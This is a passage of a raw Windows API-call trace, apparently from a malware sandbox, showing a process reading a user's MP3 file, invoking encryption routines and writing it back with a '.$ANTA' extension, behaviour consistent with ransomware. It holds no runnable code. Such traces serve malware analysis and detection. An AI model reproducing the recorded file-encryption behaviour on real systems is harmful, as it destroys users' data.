SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea00 | out: lpNewFilePointer=0x0) returned 1 [0115.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0115.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0115.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0115.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0115.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0115.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0115.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0115.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.321] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0115.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0115.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0115.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0115.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0115.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0115.322] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0115.322] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0115.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0115.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0115.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0115.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0115.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0115.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0115.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0115.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0115.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0115.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0115.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0115.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0115.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0115.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0115.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0115.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0115.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0115.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0115.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0115.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0115.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0115.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0115.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0115.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0115.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0115.323] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy")) returned 0x10 [0115.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0115.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0115.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0115.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0115.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0115.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0115.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0115.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0115.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0115.324] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\4YRCHooZsp.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\4yrchoozsp.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0115.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0115.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0115.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0115.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0115.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0115.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0115.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0115.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0115.324] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0115.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0115.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0115.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0115.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0115.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0115.325] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0115.325] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0115.325] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0115.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0115.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0115.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0115.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0115.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0115.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0115.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0115.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0115.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0115.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0115.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0115.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0115.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e03020 [0115.328] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea50 | out: lpNewFilePointer=0x0) returned 1 [0115.328] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ea78*=0xafc6, lpOverlapped=0x0) returned 1 [0115.330] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ea78*=0x0, lpOverlapped=0x0) returned 1 [0115.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0115.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0115.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0115.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0115.330] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xafc6) returned 0x4516010 [0115.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e03020 | out: hHeap=0x1780000) returned 1 [0115.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0115.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0115.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0115.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0115.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xafc6) returned 0x4520fe0 [0115.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0115.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0115.333] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0115.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0115.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0115.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0115.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0115.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xafc6) returned 0x4516010 [0115.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0115.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0115.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0115.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0115.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0115.333] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0115.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0115.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0115.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0115.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0115.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0115.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0115.334] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0115.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0115.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0115.334] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0115.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0115.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0115.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2840 [0115.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0115.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0115.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0115.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xafc6) returned 0x4516010 [0115.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2870 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0115.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2800 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0115.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27c0 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0115.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xafc6) returned 0x452bfb0 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0115.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0115.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0115.336] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0115.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0115.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0115.336] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0115.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0115.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0115.336] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0115.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0115.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2860 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0115.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0115.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0115.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0115.337] 